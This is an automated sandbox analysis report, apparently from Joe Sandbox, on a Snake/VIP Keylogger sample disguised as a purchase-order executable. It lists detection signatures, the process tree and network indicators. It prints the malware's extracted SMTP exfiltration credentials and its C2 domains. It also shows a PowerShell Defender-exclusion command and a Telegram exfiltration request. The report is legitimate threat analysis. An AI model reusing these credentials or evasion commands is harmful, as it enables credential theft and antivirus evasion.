Edit tour

Windows Analysis Report
Purchase Order 007823-PO# 005307.exe

Overview

General Information

Sample name:	Purchase Order 007823-PO# 005307.exe
Analysis ID:	1523135
MD5:	89b1330440f5e3cc7fdf662981760845
SHA1:	39484bf19c50d51022b3f90361bfd048b1ee1df6
SHA256:	2095af004e76f0cf7243b68e868eeb3b9c8c157d632aa785a87a93addf3b75fc
Tags:	exeSnakeKeyloggeruser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Purchase Order 007823-PO# 005307.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe" MD5: 89B1330440F5E3CC7FDF662981760845)

powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Purchase Order 007823-PO# 005307.exe (PID: 7672 cmdline: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe" MD5: 89B1330440F5E3CC7FDF662981760845)

Purchase Order 007823-PO# 005307.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe" MD5: 89B1330440F5E3CC7FDF662981760845)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.3791088512.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d3f7:$a1: get_encryptedPassword 0x2d704:$a2: get_encryptedUsername 0x2d215:$a3: get_timePasswordChanged 0x2d310:$a4: get_passwordField 0x2d40d:$a5: set_encryptedPassword 0x2eab8:$a7: get_logins 0x2ea1b:$a10: KeyLoggerEventArgs 0x2e680:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x360077:$a1: get_encryptedPassword 0x3a3097:$a1: get_encryptedPassword 0x3e5eb7:$a1: get_encryptedPassword 0x360384:$a2: get_encryptedUsername 0x3a33a4:$a2: get_encryptedUsername 0x3e61c4:$a2: get_encryptedUsername 0x35fe95:$a3: get_timePasswordChanged 0x3a2eb5:$a3: get_timePasswordChanged 0x3e5cd5:$a3: get_timePasswordChanged 0x35ff90:$a4: get_passwordField 0x3a2fb0:$a4: get_passwordField 0x3e5dd0:$a4: get_passwordField 0x36008d:$a5: set_encryptedPassword 0x3a30ad:$a5: set_encryptedPassword 0x3e5ecd:$a5: set_encryptedPassword 0x361738:$a7: get_logins 0x3a4758:$a7: get_logins 0x3e7578:$a7: get_logins 0x36169b:$a10: KeyLoggerEventArgs 0x3a46bb:$a10: KeyLoggerEventArgs 0x3e74db:$a10: KeyLoggerEventArgs
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb6670:$a1: get_encryptedPassword 0xb689a:$a2: get_encryptedUsername 0xb64ab:$a3: get_timePasswordChanged 0xb659a:$a4: get_passwordField 0xb6686:$a5: set_encryptedPassword 0xb85bf:$a7: get_logins 0xb8537:$a10: KeyLoggerEventArgs 0xb82cd:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x194494:$a1: get_encryptedPassword 0x194797:$a2: get_encryptedUsername 0x1942bc:$a3: get_timePasswordChanged 0x1943b7:$a4: get_passwordField 0x1944aa:$a5: set_encryptedPassword 0x196922:$a7: get_logins 0x196885:$a10: KeyLoggerEventArgs 0x1964ee:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b7f7:$a1: get_encryptedPassword 0x2bb04:$a2: get_encryptedUsername 0x2b615:$a3: get_timePasswordChanged 0x2b710:$a4: get_passwordField 0x2b80d:$a5: set_encryptedPassword 0x2ceb8:$a7: get_logins 0x2ce1b:$a10: KeyLoggerEventArgs 0x2ca80:$a11: KeyLoggerEventArgsEventHandler
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39500:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38ba3:$a3: \Google\Chrome\User Data\Default\Login Data 0x38e00:$a4: \Orbitum\User Data\Default\Login Data 0x397df:$a5: \Kometa\User Data\Default\Login Data
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c424:$s1: UnHook 0x2c42b:$s2: SetHook 0x2c433:$s3: CallNextHook 0x2c440:$s4: _hook
6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d5f7:$a1: get_encryptedPassword 0x2d904:$a2: get_encryptedUsername 0x2d415:$a3: get_timePasswordChanged 0x2d510:$a4: get_passwordField 0x2d60d:$a5: set_encryptedPassword 0x2ecb8:$a7: get_logins 0x2ec1b:$a10: KeyLoggerEventArgs 0x2e880:$a11: KeyLoggerEventArgsEventHandler
6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b300:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a9a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ac00:$a4: \Orbitum\User Data\Default\Login Data 0x3b5df:$a5: \Kometa\User Data\Default\Login Data
6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e224:$s1: UnHook 0x2e22b:$s2: SetHook 0x2e233:$s3: CallNextHook 0x2e240:$s4: _hook
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d5f7:$a1: get_encryptedPassword 0x70617:$a1: get_encryptedPassword 0xb3437:$a1: get_encryptedPassword 0x2d904:$a2: get_encryptedUsername 0x70924:$a2: get_encryptedUsername 0xb3744:$a2: get_encryptedUsername 0x2d415:$a3: get_timePasswordChanged 0x70435:$a3: get_timePasswordChanged 0xb3255:$a3: get_timePasswordChanged 0x2d510:$a4: get_passwordField 0x70530:$a4: get_passwordField 0xb3350:$a4: get_passwordField 0x2d60d:$a5: set_encryptedPassword 0x7062d:$a5: set_encryptedPassword 0xb344d:$a5: set_encryptedPassword 0x2ecb8:$a7: get_logins 0x71cd8:$a7: get_logins 0xb4af8:$a7: get_logins 0x2ec1b:$a10: KeyLoggerEventArgs 0x71c3b:$a10: KeyLoggerEventArgs 0xb4a5b:$a10: KeyLoggerEventArgs
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b300:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e320:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc1140:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a9a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d9c3:$a3: \Google\Chrome\User Data\Default\Login Data 0xc07e3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ac00:$a4: \Orbitum\User Data\Default\Login Data 0x7dc20:$a4: \Orbitum\User Data\Default\Login Data 0xc0a40:$a4: \Orbitum\User Data\Default\Login Data 0x3b5df:$a5: \Kometa\User Data\Default\Login Data 0x7e5ff:$a5: \Kometa\User Data\Default\Login Data 0xc141f:$a5: \Kometa\User Data\Default\Login Data
0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e224:$s1: UnHook 0x71244:$s1: UnHook 0xb4064:$s1: UnHook 0x2e22b:$s2: SetHook 0x7124b:$s2: SetHook 0xb406b:$s2: SetHook 0x2e233:$s3: CallNextHook 0x71253:$s3: CallNextHook 0xb4073:$s3: CallNextHook 0x2e240:$s4: _hook 0x71260:$s4: _hook 0xb4080:$s4: _hook
0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x136a37:$a1: get_encryptedPassword 0x179a57:$a1: get_encryptedPassword 0x1bc877:$a1: get_encryptedPassword 0x136d44:$a2: get_encryptedUsername 0x179d64:$a2: get_encryptedUsername 0x1bcb84:$a2: get_encryptedUsername 0x136855:$a3: get_timePasswordChanged 0x179875:$a3: get_timePasswordChanged 0x1bc695:$a3: get_timePasswordChanged 0x136950:$a4: get_passwordField 0x179970:$a4: get_passwordField 0x1bc790:$a4: get_passwordField 0x136a4d:$a5: set_encryptedPassword 0x179a6d:$a5: set_encryptedPassword 0x1bc88d:$a5: set_encryptedPassword 0x1380f8:$a7: get_logins 0x17b118:$a7: get_logins 0x1bdf38:$a7: get_logins 0x13805b:$a10: KeyLoggerEventArgs 0x17b07b:$a10: KeyLoggerEventArgs 0x1bde9b:$a10: KeyLoggerEventArgs
0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137664:$s1: UnHook 0x17a684:$s1: UnHook 0x1bd4a4:$s1: UnHook 0x13766b:$s2: SetHook 0x17a68b:$s2: SetHook 0x1bd4ab:$s2: SetHook 0x137673:$s3: CallNextHook 0x17a693:$s3: CallNextHook 0x1bd4b3:$s3: CallNextHook 0x137680:$s4: _hook 0x17a6a0:$s4: _hook 0x1bd4c0:$s4: _hook
0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb2017:$a1: get_encryptedPassword 0xf5037:$a1: get_encryptedPassword 0x137e57:$a1: get_encryptedPassword 0xb2324:$a2: get_encryptedUsername 0xf5344:$a2: get_encryptedUsername 0x138164:$a2: get_encryptedUsername 0xb1e35:$a3: get_timePasswordChanged 0xf4e55:$a3: get_timePasswordChanged 0x137c75:$a3: get_timePasswordChanged 0xb1f30:$a4: get_passwordField 0xf4f50:$a4: get_passwordField 0x137d70:$a4: get_passwordField 0xb202d:$a5: set_encryptedPassword 0xf504d:$a5: set_encryptedPassword 0x137e6d:$a5: set_encryptedPassword 0xb36d8:$a7: get_logins 0xf66f8:$a7: get_logins 0x139518:$a7: get_logins 0xb363b:$a10: KeyLoggerEventArgs 0xf665b:$a10: KeyLoggerEventArgs 0x13947b:$a10: KeyLoggerEventArgs
0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb2c44:$s1: UnHook 0xf5c64:$s1: UnHook 0x138a84:$s1: UnHook 0xb2c4b:$s2: SetHook 0xf5c6b:$s2: SetHook 0x138a8b:$s2: SetHook 0xb2c53:$s3: CallNextHook 0xf5c73:$s3: CallNextHook 0x138a93:$s3: CallNextHook 0xb2c60:$s4: _hook 0xf5c80:$s4: _hook 0x138aa0:$s4: _hook
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ParentImage: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe, ParentProcessId: 7488, ParentProcessName: Purchase Order 007823-PO# 005307.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ProcessId: 7652, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 208.91.199.223, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ParentImage: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe, ParentProcessId: 7488, ParentProcessName: Purchase Order 007823-PO# 005307.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe", ProcessId: 7652, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T07:21:02.213042+0200	2803305	3	Unknown Traffic	192.168.2.9	49711	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T07:21:00.644750+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49708	132.226.247.73	80	TCP
2024-10-01T07:21:01.644807+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49708	132.226.247.73	80	TCP
2024-10-01T07:21:02.972884+0200	2803274	2	Potentially Bad Traffic	192.168.2.9	49713	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "makwanda@itc-ib.net", "Password": "qimnnEB2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: Purchase Order 007823-PO# 005307.exe	ReversingLabs: Detection: 36%
Source: Purchase Order 007823-PO# 005307.exe	Virustotal: Detection: 31%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Purchase Order 007823-PO# 005307.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49710 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49728 version: TLS 1.2

Source: Purchase Order 007823-PO# 005307.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: XpkT.pdb source: Purchase Order 007823-PO# 005307.exe
Source:	Binary string: XpkT.pdbSHA256h! source: Purchase Order 007823-PO# 005307.exe

Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 4x nop then jmp 0296F8E9h		6_2_0296F630
Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe	Code function: 4x nop then jmp 0296FD41h		6_2_0296FA88

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.9:49731 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2001/10/2024%20/%2013:45:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49713 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49708 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49711 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.9:49731 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
